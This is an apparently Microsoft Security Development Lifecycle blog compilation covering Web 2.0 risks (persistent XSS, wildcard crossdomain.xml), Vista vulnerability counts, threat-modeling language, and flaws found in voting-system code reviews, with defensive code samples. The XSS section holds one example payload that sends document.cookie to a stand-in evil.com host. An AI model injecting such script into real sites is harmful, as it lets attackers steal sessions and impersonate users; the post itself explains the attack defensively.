Hi everyone, Bryan Sullivan here.
Unless you’ve been living in an ice cave on the polar cap for the last month, you’ve heard about Microsoft’s proposed acquisition of Yahoo. George Hulme of InformationWeek wrote a very insightful column about the proposed acquisition and what it would mean for Yahoo’s Web 2.0 properties. My favorite quote from this column (probably my favorite quote from anyone’s column so far this year): “…there’s still much to do in the [software] industry to reach a level of truly sustainable computing. This is perhaps especially true in the nascent area of Web 2.0 development. Let’s hope Microsoft brings its Trustworthy Computing Initiative, or more precisely its Security Development Lifecycle to Yahoo, should the $45 billion deal come through.” That’s pretty high praise for the SDL, but what exactly does the SDL have to say about Web 2.0 development? To answer this question, let’s take a look at a couple of security issues that affect Web 2.0 applications and then dive into the corresponding SDL requirements.
Many Web 2.0 applications allow their end users to build and contribute to the application. Think about social networking sites like Facebook, or wikis like Wikipedia. The content on sites like these comes directly from the users themselves. (Remember that you were Time Magazine’s Person of the Year in 2006 for this very reason!) While this is very empowering for users, it does raise the question: If users can add their own content to a web site, what’s to prevent them from adding malicious content? Consider what would happen if Evil Eve adds the following HTML to a wiki entry:
<script>new Image().src = "http://www.evil.com/eve?" + document.cookie;</script>
If the wiki accepts this content from Eve, then anyone who looks at the wiki entry will have their browser cookie “stolen” and sent to Eve at evil.com. The cookie could potentially contain login credentials or other sensitive information, allowing Eve to impersonate her victim and essentially commit a form of identity theft.
The attack I’ve shown here is known as a persistent Cross-Site Scripting (XSS) attack, and is the most dangerous form of XSS since it doesn’t require any social engineering like reflected and DOM-based XSS attacks do. The victim doesn’t have to do anything unusual – he just has to browse to an infected page, maybe even one he’s been to hundreds of times in the past. And in all likelihood, he’ll never even know he was a victim. The Samy worm, which infected MySpace in late 2005, exploited a persistent XSS vulnerability to silently spread through its victims’ profile pages. In less than a day after its release, Samy had spread to over one million MySpace users, forcing MySpace to completely shut down its site while it diagnosed and fixed the vulnerability.
(As a side note, I’d like to point out that if the developers of the hypothetical wiki in the earlier example had used the HttpOnly attribute for their site cookies, Evil Eve would not have been able to steal those cookies. However, HttpOnly is just a defense-in-depth measure and not a complete solution for the inherent problem of end users being able to write malicious code into the web site.)
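As a minimal sketch of that side note, assuming the hypothetical wiki's server side is written in Python: the standard library's http.cookies module can emit the HttpOnly attribute. The cookie name session_id and the helper build_session_cookie are made up for illustration and are not part of any real site.

```python
from http.cookies import SimpleCookie


def build_session_cookie(session_id: str) -> str:
    """Return a Set-Cookie header value with the HttpOnly attribute set.

    The cookie name "session_id" is hypothetical, chosen only for this sketch.
    """
    cookie = SimpleCookie()
    cookie["session_id"] = session_id
    # HttpOnly asks the browser to hide this cookie from document.cookie,
    # so injected script cannot read it. It does not stop the injection itself.
    cookie["session_id"]["httponly"] = True
    cookie["session_id"]["path"] = "/"
    return cookie["session_id"].OutputString()


header_value = build_session_cookie("abc123")
print(header_value)
```

This only narrows what injected script can read; the page still runs whatever Eve managed to store in it.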
Web mashups are another popular component of Web 2.0. JavaScript’s Same Origin Policy prevents web developers from writing client-based mashups (that is, mashups that don’t use a server proxy to request data from the individual sites being “mashed” together) in straight DHTML. Some Rich Internet Application (RIA) frameworks, notably Adobe’s Flash and Microsoft’s Silverlight, offer mechanisms to bypass the Same Origin Policy. For Flash, this mechanism is an XML file (crossdomain.xml) hosted on the domain root that lists all the external domains that should be granted access to the Flash movie. For example, if you host a Flash movie at www.mysite.com, and want to allow access from www.friendlysite.com, you would create a file www.mysite.com/crossdomain.xml with content as follows:
<cross-domain-policy>
<allow-access-from domain="www.friendlysite.com"/>
</cross-domain-policy>
So far, so good. However, crossdomain.xml allows not just specific domain names in the allow-access-from element (i.e., “www.friendlysite.com”) but also wildcards (“*.friendlysite.com”). In fact, it will even allow wildcards that break the two-dots rule like “*.com” or even just “*”. By using highly permissive access lists like this, a developer is essentially letting anyone on the internet manipulate his objects and data. In an attack very reminiscent of the Samy worm, Chris Shiflett exploited an allow-access-from-* entry in Flickr’s crossdomain.xml file, causing any visitor to Chris’s web site to automatically add Chris to their Flickr friends list. While this may not be the scariest attack you’ve ever heard of, imagine what might happen if a truly malicious user discovers the same vulnerability in the fund transfer functionality of a bank’s web site, or the security trading functionality of a brokerage firm’s web site.
So, what does the SDL have to say about these issues? In terms of XSS prevention, the SDL offers a lot of guidance. The SDL requires the use of both input validation (making sure that user input conforms to a known good format – in the case of the wiki entry, to deny HTML and script content) and output encoding (making sure that any active content that gets past the input validation routines is rendered as harmless text and not executed). Internally, we also mandate the use of code analysis tools to find XSS vulnerabilities that might otherwise slip through the cracks. This is great advice for anyone developing web applications, whether they’re Web 2.0 or 1.0.
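To make the output encoding half of that guidance concrete, here is a small sketch in Python, assuming the wiki renders user text into an HTML page. It uses the standard library's html.escape; the function name render_wiki_text and the sample payload are illustrative only, and this is not a description of the SDL's own tooling.

```python
import html


def render_wiki_text(user_text: str) -> str:
    """Encode user-supplied text so the browser displays it instead of running it."""
    # html.escape replaces <, > and & with character references; quote=True
    # also encodes both quote characters, which matters inside attributes.
    return html.escape(user_text, quote=True)


# Hypothetical stored payload of the kind Evil Eve might submit.
malicious = '<script>new Image().src="http://www.evil.com/eve?"+document.cookie</script>'
safe = render_wiki_text(malicious)
print(safe)
```

Encoding at output time is the backstop; it complements, and does not replace, validating the input against a known good format.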
As for cross-domain policy files, the SDL provides several recommendations. First is a simple attack surface reduction: if a site is not meant to be accessed by foreign domains, then any cross-domain policy files should be removed from the site. Second, if an application offers cross-domain access and also has functionality available only to authenticated users, then this site must not contain overly permissive access lists like “*” or “*.com”. It’s best to list specific domains wherever possible, or at least follow the same two-dots rule that HTTP cookies have to follow for their domain specifications. This helps to limit the sites that can perform request forgery attacks like the Flickr attack mentioned earlier. If no applications anywhere on the site offer special functionality for authenticated users, then the SDL does permit the site to have a broad-reaching cross-domain access list. However, this does require constant oversight to ensure that no authenticated applications are added to the site at a later time. In my opinion, it’s safer just to lock down the list to exactly the sites that are necessary and no more.
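One way to keep that oversight from depending on memory is a small check that runs against the policy file. The following is only a sketch in Python, assuming the policy uses the allow-access-from element shown earlier; the function name and the sample policy are hypothetical. It flags any wildcard entry with fewer than two dots.

```python
import xml.etree.ElementTree as ET
from typing import List


def overly_permissive_domains(policy_xml: str) -> List[str]:
    """Return allow-access-from domains that use a wildcard and break the two-dots rule."""
    root = ET.fromstring(policy_xml)
    flagged = []
    for entry in root.iter("allow-access-from"):
        domain = entry.get("domain", "")
        # "*" has zero dots and "*.com" has one; "*.friendlysite.com" has two.
        if "*" in domain and domain.count(".") < 2:
            flagged.append(domain)
    return flagged


# Hypothetical policy used only to exercise the check.
sample_policy = """
<cross-domain-policy>
  <allow-access-from domain="www.friendlysite.com"/>
  <allow-access-from domain="*.friendlysite.com"/>
  <allow-access-from domain="*.com"/>
  <allow-access-from domain="*"/>
</cross-domain-policy>
"""
print(overly_permissive_domains(sample_policy))
```

Like the cookie rule it borrows from, the two-dots test is a coarse filter: an entry such as "*.co.uk" would pass it, so listing specific domains remains the safer choice.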
Regardless of what happens between Microsoft and Yahoo, I agree with George that adoption of the SDL would benefit Yahoo’s Web 2.0 applications. In fact, I’ll take it a step further and state that adoption of the SDL would benefit anyone’s Web 2.0 applications. In my next SDL blog post, I’ll be addressing the trickiest aspect of implementing the SDL for Web 2.0: developing the “perpetual beta”.
Hi, Michael here.
I am always bemused when Jeff Jones performs in-depth security vulnerability analysis and reports his findings, not because of the content of his findings, but because of the incredible arm-chair commentary that follows.
Jeff and I have seen and heard it all:
You get the picture. I could keep going, but I have a blog post to write!
So let's ignore raw stats for a moment. Let's not compare Red Hat to Mac OS X to Ubuntu to Windows Vista because, let's face it, no one can agree on any measurement of security without getting knotted up. So let's just ignore the comparison stuff. Measuring security is a real challenge, and while we may debate the merits of vulnerability counts, right now it's the only concrete metric we have.
When Bill Gates released his Trustworthy Computing Memo in 2002, many people thought it was just a marketing stunt. It was not a marketing stunt: BillG edicts are always taken very seriously inside Microsoft. In fact, I will go one step further: the only way you make big changes in a large software company is when the boss says you have to do so. So why did Bill send the memo to all Microsoft employees? It was simple: he (and the entire senior management team for that matter) recognized Microsoft faced a problem that needed solving. The company needed to shore up the security of its products. So Bill sent his memo to get the ball rolling.
Now let's go back to Jeff's recent analysis. Cover up the Mac OS X and Linux stats for a moment so you can only see the Windows XP SP2 and Windows Vista bars. Windows Vista has had fewer security vulnerabilities than Windows XP SP2. Conventional wisdom (which is often wrong, especially when it becomes urban legend) tends to suggest that the more lines of code you have the more bugs you have. That might very well be true, and Windows Vista is certainly larger than Windows XP SP2; yet right now, we are on track for an approximately 50% reduction in vulnerabilities compared to Windows XP SP2. Think about that figure for a moment: about a 50% reduction (and that does not account for the reduction in vulnerability severity) despite the increase in code size.
So if Windows Vista has more code than Windows XP SP2, why are we seeing a reduction in vulnerabilities? Simple: the SDL! Microsoft decided to change its development practices to enforce greater security discipline. The only way you reduce security vulnerabilities is by focusing on improving code security, design security, reducing attack surface, education, tracking evolving threats, mandatory use of tools, banning known bad functionality, better compilers, better linkers, better libraries etc etc. And that is what the SDL is all about and what our team is laser-focused on.
The reason you're seeing a reduction in vulnerabilities across major Microsoft products is simple:
You improve security by focusing on security. Not by wishing on a star. Not by believing age-old myths about "given enough eyeballs.... blah blah." If the "eyeballs" mantra were true, we'd have very few open source security bugs. But there are plenty of open source security bugs found after products ship. Hmmm, this would seem to raise some interesting questions about the validity of the "enough eyeballs" belief given these hard facts.
Now let's go back to Jeff's chart for a moment. Cover the Windows columns and look at the other columns. However you want to skew or spin it, that's a lot of security vulnerabilities that needed fixing once a product had shipped. Admit it. Come on; admit it, that's a lot of bugs. I don't care how big a Linux distro is, or how many IM clients Ubuntu ships with, or the merits of UAC vs su. That's a lot of security vulnerabilities!
Now ask yourself this question: how many people involved in the development of these other products have you heard say, "Wow, we have a lot of security bugs, we really should do something systematic to fix this problem"? I'll be very happy to be proved wrong, but all I hear is crickets. I see no one else in the industry standing up and saying, "Let's fix this."
I just hear emotion, excuses and dogma.
At Microsoft, BillG's memo was a "we need to fix this" memo, and we are now seeing results, but not perfection. There will be no perfection, because no software is 100 percent secure, but progress is being made across all Microsoft products, not just Windows, because of the SDL.
Let me close with a story. A few years ago I spoke to some senior technical people from a large financial organization about software security. After visiting Microsoft they were off to visit another operating system vendor. I won't name names. The financial company was very interested in our early results, and they were encouraged by what they saw because of the SDL. I asked the most senior guy in the room to ask the other company one very simple question, "What are they doing to improve the security of their product? And by that I mean, what are they doing to reduce the chance security vulnerabilities will creep into the product in the first place? And they cannot use the word ‘Microsoft' in the reply." Two weeks later, the guy phoned me and said his company would buy Microsoft products and nothing from the other company. I asked him why. He said because all they could do was make up excuses (see the list at the start for examples!) rather than admit to having numerous critical security vulnerabilities and no process to reduce their ingress.
Ok, one more comment! I would love to see others in the industry stand up and admit there is a problem that needs solving and start doing something about it. I really, really would, because we need to secure the entire computing ecosystem. Comparing numbers is interesting, but what really matters is this: is progress being made? At Microsoft the answer is "yes" but only because BillG realized there was a problem to be solved and that is what led to the birth of the SDL.
One of the critiques of the threat modeling process (and perhaps of these blog posts) is that it can seem interminable. And so, in this final post, I’d like to offer up some final thoughts on language and cognitive load.
Specification versus Analysis
When Larry Osterman was writing about threat modeling, he casually tossed out:
A threat model is a specification, just like your functional specification (a Program Management spec that defines the functional requirements of your component), your design specification (a development spec that defines the architecture that is required to implement the functional specification), and your test plan (a test spec that defines how you plan on ensuring that the design as implemented meets the requirements of the functional specification). Just like the functional, design and test specs, a threat model is a living document - as you change the design, you need to go back and update your threat model to see if any new threats have arisen since you started.
I found this pretty surprising. I think of threat modeling as an analysis technique, but hey, if test plans are specs, threat models aren’t that different. (It took some private back and forth with Larry to convince me.) This brings me to the topic of what words we use to describe things.
On language
[The English language] becomes ugly and inaccurate because our thoughts are foolish, but the slovenliness of our language makes it easier for us to have foolish thoughts. The point is that the process is reversible. Modern English, especially written English, is full of bad habits which spread by imitation and which can be avoided if one is willing to take the necessary trouble. If one gets rid of these habits one can think more clearly, and to think clearly is a necessary first step toward political regeneration: so that the fight against bad English is not frivolous and is not the exclusive concern of professional writers. (George Orwell, Politics and the English Language.)
We ask people to threat model (as part of the SDL) by threat modeling their application. To do that, they model the design, and then have a threat modeling meeting in which someone runs the threat modeling tool to produce a threat modeling document. In our particular case, I’m not sure it’s easily avoided.
“We ask people to analyze their designs (as part of the SDL). To do that, they diagram the design, then have a threat modeling meeting in which someone runs the codename tool to produce a threat modeling document.”
In fact, I’ve worked hard to reduce jargon in the process, but at one point I went too far. I tried to convince people to say “diagram” instead of DFD, and they revolted. Actually, they didn’t really revolt, but they did refuse to go along. Experienced threat modelers actually felt that the term DFD was clearer than saying “diagram,” because DFD includes a specification of what kind of diagram, and they had already integrated the acronym into their thinking. Having integrated it, they could use it without thinking about it. Well, as Adam Barr points out, “you can pick your friends, and you can pick your nose, but you can't pick your online community's lexicon.”
It didn’t add to their cognitive load to say “DFD.”
Cognitive Load
People can only handle so much new information at one time. Learning to drive a stick shift is harder than learning on an automatic, because there’s a whole set of tasks you can ignore while the automatic transmission handles them for you. In my approach, this relates pretty closely to the concept of flow. If you’re so focused on rules and jargon, you can’t focus on what you should be building: cool, well-designed features to help your customers.
In Conclusion
We started this series by looking at the trouble with threat modeling: how people had trouble getting started, relating the process to their other work, or validating what they’d done. We’ve looked at the new threat modeling process, and the steps involved. We talked about how to get into the flow with threat modeling, and how clear goals, direct and immediate feedback, and balancing ability and challenges set people up to focus their attention and succeed. We’ve talked a bit about making threat modeling work better by adding structure to chaos, and how to use self-checks and rules of thumb to give people confidence they’re on the right trail. We’ve talked a very little bit about how to customize the process for your own needs, and where that customization can be dangerous.
All of this has come out of looking at our threat modeling activity as a human activity, and asking how we can best shape it to help people get to the results that we want. I hope that our readers have enjoyed the series, which we’ve converted into a downloadable document (here).
Hi folks, Eric Bidstrup here.
We interrupt our regular schedule of blog postings to offer this special post for “Super Tuesday” given the subject matter. Hope you enjoy…
This year is a presidential election year in the United States. Selecting a new president is perhaps the ultimate example of the importance of having a trustworthy election process. There have been some well chronicled examples of elections with extremely close results, where the winner’s margin of victory was perhaps smaller than the election system’s margin of error. The term “Hanging Chads,” from the 2000 U.S. presidential election, is now part of the American vocabulary, and locally here in Washington State our last gubernatorial election in 2004 required 3 recounts with the final winner being determined by a margin of only 129 votes, or 0.0045% of the popular vote.
The populace demands confidence that, even in close elections, the election result accurately reflects the voters’ intent. In theory, such precision can be improved by using computers and technology.
However, it seems that every recent election season brings stories in the media about the security of voting machines (and their software). A recent New York Times article provides a good overview of voting machine security concerns, and academic studies on voting systems last year in California, Connecticut, Florida, and Ohio provide some interesting insights about security concerns and vulnerabilities in voting systems from several vendors.
These analyses are fascinating to us, because they offer an opportunity to see how a set of experts look at products other than ours. Applied security researchers often analyze our products, and often share their processes and tools with us, but it’s rare to see a top-to-bottom product review released. In California, there was both white and black box testing done by different teams, and we’ve studied these reports to see the perceptions of development practices from other vendors and results of a different type of review process.
Something my colleagues and I find very interesting is that many of the vulnerabilities noted in these reports could have been prevented by following the requirements in Microsoft’s Security Development Lifecycle. The studies performed in California (prepared at UC Berkeley but created by teams of academics from across the United States) included detailed source code analysis. I’ll select out a few examples from those studies and describe them here. (Note: I’m deliberately picking a few examples from each vendor assessed in the study. I am not attempting to criticize any specific vendor, but rather am trying to illustrate examples of areas where application of the SDL could help contribute towards society’s need for trustworthy computing in a very visible and important application.)
Let’s start with the Source Code Review of the Sequoia Voting System. Two examples from the executive summary are interesting:
“Cryptography. …Many cryptographic functions are implemented incorrectly, based on weak algorithms with known flaws, or used in an ineffective or insecure manner. Of particular concern is the fact that virtually all cryptographic key material is permanently hardcoded in the system (and is apparently identical in all Sequoia hardware shipped to different jurisdictions)…
Software Engineering. …The software suffers from numerous programming errors, many of which have a high potential to introduce or exacerbate security weaknesses. These include buffer overflows, format string vulnerabilities, and type mismatch errors….”
A deeper reading of the cryptographic concerns (page 29 in report) notes concerns (amongst others) over the use of a flawed implementation of the SHA hash algorithm and use of the Data Encryption Standard (DES) algorithm. The SDL has specific policies outlining appropriate selection of cryptographic algorithms. For example, DES is prohibited except for backwards compatibility. The SDL also requires that applications use operating system cryptographic functions and libraries. The cryptography team in the operating systems group is supported by world-class cryptographers who carefully scrutinize the implementation of crypto algorithms. Additionally, these operating system functions are formally reviewed and certified by the National Institute of Standards and Technology (NIST) Cryptographic Module Validation Program (CMVP), which validates that cryptographic modules meet Federal Information Processing Standards (FIPS). Most application developers are not cryptographers and hence are unlikely to implement crypto algorithms correctly. The SDL requires the use of standard crypto functions and outlines requirements on algorithm selection, key length and key management.
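The general idea of relying on vetted library functions, and of not baking one key into every device, can be sketched as follows. This is an illustration only: it uses Python's standard hashlib, hmac and secrets modules as a stand-in for the operating system libraries mentioned above, the function names are hypothetical, and it says nothing about how any voting vendor's code is actually structured. Key storage and distribution are deliberately left out.

```python
import hashlib
import hmac
import secrets


def new_device_key() -> bytes:
    """Generate a fresh random 256-bit key per device instead of hardcoding one."""
    return secrets.token_bytes(32)


def tag_record(key: bytes, record: bytes) -> str:
    """Compute an HMAC-SHA256 tag using the library's implementation, not a hand-written hash."""
    return hmac.new(key, record, hashlib.sha256).hexdigest()


def verify_record(key: bytes, record: bytes, tag: str) -> bool:
    """Check a tag; compare_digest avoids leaking information through comparison timing."""
    return hmac.compare_digest(tag_record(key, record), tag)


key = new_device_key()
tag = tag_record(key, b"example record")
print(verify_record(key, b"example record", tag))
```

The point of the sketch is the division of labor: the application chooses an approved algorithm and key length, and leaves the implementation of the primitive to a library that specialists maintain.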
Moving to the software engineering concerns: while several common coding and design concerns are noted (e.g. input validation), I want to select one with a bit more subtlety: running code from USB sticks (page 37 in report). From the report, it appears the code present on the USB sticks is used to program a component (HAAT) of their client (WinEDS) to prepare for a specific election. The valid concern noted by the study is that USB sticks used by WinEDS to configure the HAAT are implicitly trusted to have appropriate authorization to program the voting devices for an election, and that a formal authorization framework didn’t appear to be present. The implication (as stated in the report) is: “If such a stick is used in a HAAT that has been compromised by an attacker, or an attacker can provide a maliciously modified USB stick in place of a legitimate one, the attacker could surreptitiously take complete control over the WinEDS client”. Basically, this is a potential “rootkit” for election systems. A threat model, a fundamental design requirement of the SDL, could help uncover such design issues and illustrate the need for mitigations.
Now, let’s turn to the Source Code Review of the Hart InterCivic Voting System. I’ll try to keep my commentary balanced by selecting two examples here as well:
From the executive summary:
“Unsecured network interfaces … Voters can connect to unsecured network links in a polling place to subvert eSlates, as well as to eavesdrop on cast votes and to inject new votes. Poll workers can connect to JBCs or eScans over the management interfaces and perform back-office functions such as modifying the device software. The impact of this is that a malicious voter could potentially take over one or more eSlates in a precinct and a malicious poll worker could potentially take over all the devices in a precinct. …
Failure to protect ballot secrecy Hart’s system fails to adequately protect ballot secrecy...”
The concerns about unsecured network interfaces are discussed in the context of authentication and least privilege (pages 24-25). While that is certainly a reasonable perspective, with the SDL we take a broader view and require all teams to threat model the attack surface of the software being developed. Attack surface is the enumeration of all possible entry points that an attacker could use to compromise software (code listening to network interfaces, code that accepts data from external sources, etc). The SDL requires development teams to both minimize attack surface in the software they are building and to consider attacks from each entry point on the attack surface to ensure that mitigations are present. It would appear that these examples show that the development teams didn’t adopt such a systematic approach, or failed to think about mitigations of each possible attack if they did.
Ballot secrecy is an example where security and privacy concerns intersect. Many people confuse security and privacy, and both are fundamental to trust. Privacy addresses a wide variety of concerns about many types of data (such as Personally Identifiable Information (PII), ballot data, etc.), how it’s handled (gathered, transmitted, stored, and disposed of) and what rights and expectations different stakeholders may have regarding that data. (Tina Knutson gave a great overview on these issues in a previous blog posting, “Privacy is not just about data security”.) Security provides the mechanisms, policies, and practices to enforce privacy requirements. Given the intertwined nature of these issues, both are addressed in the SDL.
The concerns about vote storage (section 6.8, page 58 of report) review some classic challenges in software security and privacy with weak random number generation. Randomization is important here since it controls how votes are stored in memory, and weak randomization enables someone to reverse engineer how individual voters voted by examining the aggregate tally of votes (which can be found on the Mobile Ballot Boxes “MBB”) in conjunction with the audit log. The MBB has mitigations in place to protect integrity (tampering) of votes, but doesn’t appear to protect against information disclosure. The SDL cryptographic policies also cover correct random number generation. Fully considering all the ways in which data can be reverse engineered, contextualized (order of log entries providing information that can be linked to individuals’ choices), and correlated with other data sources is a growing challenge. In the SDL privacy policies, we call attention to these issues, but it remains difficult.
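To illustrate why the source of randomness matters, here is a hedged sketch in Python of shuffling a storage order with the operating system's cryptographic random source rather than a predictable, seedable generator. The function name and the idea of shuffling a simple list are assumptions made for illustration; the report describes the real system's storage scheme, and this is not it.

```python
import secrets


def shuffled_storage_order(ballots: list) -> list:
    """Return a copy of the ballots in an order drawn from the OS random source."""
    # secrets.SystemRandom draws from the operating system's CSPRNG, so the
    # order cannot be replayed from a guessed seed the way random.Random(seed) can.
    rng = secrets.SystemRandom()
    order = list(ballots)  # copy, so the caller's list is left untouched
    rng.shuffle(order)
    return order


# Hypothetical ballot identifiers in the order they were cast.
cast_order = ["ballot-1", "ballot-2", "ballot-3", "ballot-4", "ballot-5"]
stored = shuffled_storage_order(cast_order)
print(sorted(stored) == sorted(cast_order))
```

A strong shuffle addresses only the ordering; as noted above, log entries and other data sources can still leak the link between a voter and a ballot.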
Next, let’s look at the Source Code Review of the Diebold Voting System. Again, I’ll pick two subjects.
“Vulnerability to malicious software: The Diebold software contains vulnerabilities that could allow an attacker to install malicious software on voting machines or on the election management system…
Vulnerability to malicious insiders: The Diebold system lacks adequate controls to ensure that county workers with access to the GEMS central election management system do not exceed their authority….”
Let’s look at the “Malicious Software” first: While there’s a lot of discussion of general concerns with viruses and malicious payloads, I’d like to drill down on a specific case noted in section 4.2.3 (page 29). The typical concerns around string handling in C/C++ and buffer overflows are mentioned. What is interesting is that in many places this system uses the Microsoft Foundation Classes (MFC) CString class to help mitigate such concerns. The problem noted is that this practice is not consistently followed, and in fact there is a case of one specific function making calls to both CString *and* a standard C string library, in the same function. So here it appears the engineering team had the right idea by trying to remove calls to potentially risky C string library functions (just as required in SDL), but they just weren’t able to consistently and completely apply it.
Regarding the executive summary concern about malicious insiders, I’m inclined to attribute it to what’s described in section 4.3 on page 30: “No formal threat model or security plan” and “No formal security training”. Both of these are pivotal elements in the SDL. Several comments are offered to the effect that “security measures that are in place appeared to be ad hoc”, and “When new developers arrive at the company, they do not receive any kind of security training”. We’ve blogged here in the past about the importance of both areas, so I won’t repeat that again. (See Adam’s Threat Modeling series and Dave’s “Security Education v. Security Training” posts respectively for more info).
Is the SDL enough to ensure trustworthy voting systems?
When I offered this blog post for the review of my colleagues, it generated some very interesting discussion. Some of my colleagues were worried that I would misrepresent the SDL as a panacea for creating perfectly trustworthy voting systems. Let me be clear: this is absolutely NOT the case. While the SDL could help mitigate repeating many of the problems identified in these studies, it’s worth noting that election systems have a number of unusual and unique requirements. For example, voters cannot review their voting records as they would their banking records to ensure that no fraud has been committed – since the ability to do so would typically enable vote-selling and coercion. Alternate techniques are therefore required to allow voters to verify that their votes have been properly counted. Such requirements force the adoption of “extraordinary” techniques that go beyond those of secure software engineering. Furthermore, the expectations of society on the trustworthiness of voting systems are much greater as compared to other types of software (for example: the latest XBOX game title). I’ll further explore differences in how different people think about “degrees of trustworthiness” (aka “assurance” or “robustness”) in a future posting.
Summary
Let me wrap up by saying this: building secure software is difficult. Prior to the advent of Trustworthy Computing and the Security Development Lifecycle here at Microsoft, I’d bet that many of the issues noted in these reports would have applied to earlier Microsoft products too. Some might think I’m throwing stones while living in a glass house, but that is not my intent. While Microsoft products are not vulnerability free, we continue to systematically analyze the sources of vulnerabilities in our software. We continue to modify our engineering practices and tools to better identify potential vulnerabilities and mitigate them before software is released. With increasing awareness and concerns over the trustworthiness of computers in general, the entire industry needs to improve. Given the importance of how we choose to organize ourselves as a society and elect representatives to govern us, voting systems are a great place to step up both in the context of the computing industry, and to better serve society.
I believe many of the issues found in these voting systems would not have entered the systems if the SDL had been used to design and build them.